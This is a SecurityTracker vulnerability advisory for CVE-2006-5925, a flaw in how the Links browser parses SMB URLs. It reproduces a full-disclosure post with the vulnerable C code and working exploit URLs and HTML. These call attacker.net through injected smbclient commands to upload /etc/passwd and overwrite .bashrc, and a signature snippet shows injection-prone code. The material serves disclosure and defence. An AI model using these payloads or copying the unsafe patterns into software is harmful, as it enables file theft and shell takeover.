SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Links Vendors:   links.sourceforge.net
Links SMB URL Parsing Bug Lets Remote Users Upload/Download Files
SecurityTracker Alert ID:  1017233
SecurityTracker URL:  http://securitytracker.com/id/1017233
CVE Reference:   CVE-2006-5925   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Nov 15 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 1.00pre18 and prior versions (tested on 1.00pre12 on Ubuntu)
Description:   A vulnerability was reported in Links. A remote user can cause arbitrary smbclient commands to be executed.

The smbclient code does not properly parse SMB URLs. A remote user can create HTML with a specially crafted URL that, when loaded by the target user, will upload files to or download files from the target user's system.

Some demonstration exploit URLs are provided:

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit;

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit;

Teemu Salmela reported this vulnerability.

[Editor's note: From code review, it appears that the Twibright Labs Links implementation version 2.1pre24 is also affected. However, this has not been confirmed.]

Impact:   A remote user can obtain files from or create files on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  links.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  BeOS, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Links smbclient command execution

Links smbclient command execution
-----------------------------------------------------------------------------
There is a flaw in the Links web browser, that allows malicious web sites to
execute smbclient commands on the victim's machine. This flaw makes it
possible to read any file from the victim system (any file that the user
running links has read access), or to upload any file to the victim system
(any file that the user running links can create/overwrite).  The attacker
could, for example, upload ~/.bashrc to gain shell access.

Version numbers:
-----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also
be installed.

Vulnerable code:
-----------------------------------------------------------------------------
smb_func() in smb.c:
    ...
    143                 if (*share) {
    144                         if (!*dir || dir[strlen(dir) - 1] == '/' 
|| dir[strlen(dir) - 1] == '\\') {
    145                                 if (dir) {
    146                                         v[n++] = "-D";
    147                                         v[n++] = dir;
    148                                 }
    149                                 v[n++] = "-c";
    150                                 v[n++] = "ls";
    151                         } else {
    152                                 unsigned char *ss;
    153                                 unsigned char *s = stracpy("get 
\"");
'dir' is the directory part of the smb://.. url:
    154                                 add_to_strn(&s, dir);
    155                                 add_to_strn(&s, "\" -");
    156                                 while ((ss = strchr(s, '/'))) 
*ss = '\\';
    157                                 v[n++] = "-c";
    158                                 v[n++] = s;
    159                         }
    160                 }
    161                 v[n++] = NULL;
smbclient is executed:
    162                 execvp("smbclient", (char **)v);
    163                 fprintf(stderr, "smbclient not found in $PATH");
    164                 _exit(1);
    ...

Exploit:
-----------------------------------------------------------------------------
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd 
etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd 
home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>

-- 
fscanf(socket,"%s",buf); printf(buf);
sprintf(query, "SELECT %s FROM table", buf);
sprintf(cmd, "echo %s | sqlquery", query); system(cmd);
Teemu Salmela 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC